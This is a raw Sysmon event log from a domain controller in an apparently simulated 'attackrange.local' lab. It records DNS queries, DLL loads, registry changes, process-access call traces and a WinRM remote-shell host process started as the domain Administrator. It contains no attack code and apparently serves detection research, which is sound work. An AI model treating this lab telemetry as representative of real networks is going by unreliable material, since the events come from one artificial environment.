13:34:38.569{59A5CD1D-8E46-6005-1400-00000000A301}1304win10.ipv6.microsoft.com.0type: 5 onpremwindows.ipv6.microsoft.com.akadns.net;type: 5 trdovmssukwest.ipv6.microsoft.com.akadns.net;40.81.120.44;C:\Windows\System32\svchost.exe 22542200x80000000000000002657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.569{59A5CD1D-8E46-6005-1600-00000000A301}1544win10.ipv6.microsoft.com.0type: 5 onpremwindows.ipv6.microsoft.com.akadns.net;type: 5 trdovmssukwest.ipv6.microsoft.com.akadns.net;40.81.120.44;C:\Windows\System32\svchost.exe 
22542200x80000000000000002656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.569{59A5CD1D-8E56-6005-2E00-00000000A301}2464crl4.digicert.com0type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Windows\sysmon64.exe 22542200x80000000000000002655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.569{59A5CD1D-8E46-6005-1100-00000000A301}1172time.windows.com0type: 5 time.microsoft.akadns.net;::ffff:51.105.208.173;C:\Windows\System32\svchost.exe 22542200x80000000000000002654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.569{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.568{59A5CD1D-8E56-6005-2900-00000000A301}2768attackrange.local0type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.567{59A5CD1D-8E56-6005-2E00-00000000A301}2464b.8.8.4.5.3.4.7.1.0.8.5.4.2.c.7.3.8.5.3.b.e.0.0.c.f.0.0.0.0.0.e.ip6.arpa.9502-C:\Windows\sysmon64.exe 22542200x80000000000000002651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.567{59A5CD1D-8E56-6005-2900-00000000A301}2768attackrange.local0type: 2 win-dc-495.attackrange.local;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.567{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.567{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9502-C:\Windows\System32\lsass.exe 
22542200x80000000000000002648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.566{59A5CD1D-8E46-6005-1000-00000000A301}1164attackrange.local0::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.566{59A5CD1D-8E56-6005-2900-00000000A301}2768win-dc-495.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.566{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.566{59A5CD1D-8E44-6005-0B00-00000000A301}856attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.566{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9502-C:\Windows\System32\lsass.exe 22542200x80000000000000002643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.565{59A5CD1D-8E46-6005-1400-00000000A301}1304_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9502-C:\Windows\System32\svchost.exe 22542200x80000000000000002642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.150{59A5CD1D-8E56-6005-2900-00000000A301}2768win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.149{59A5CD1D-8E44-6005-0B00-00000000A301}856WIN-DC-4950fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 
22542200x80000000000000002640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.148{59A5CD1D-8E56-6005-2900-00000000A301}2768localhost0::1;::ffff:127.0.0.1;C:\Windows\System32\dns.exe 22542200x80000000000000002639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.064{59A5CD1D-8E56-6005-2E00-00000000A301}2464crl3.digicert.com1460-C:\Windows\sysmon64.exe 734700x80000000000000002638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.720{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000002637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.720{59A5CD1D-8E6E-6005-7B00-00000000A301}31684116C:\Windows\system32\conhost.exe{59A5CD1D-8E6E-6005-7A00-00000000A301}3848C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7B00-00000000A301}3168C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.688{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:34:38.688{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000001) 10341000x80000000000000002629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000000) 10341000x80000000000000002626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.688{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7A00-00000000A301}3848C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7A00-00000000A301}3848C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.693{59A5CD1D-8E6E-6005-7A00-00000000A301}3848C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E64-6005-AB65-050000000000}0x565ab0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.688{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 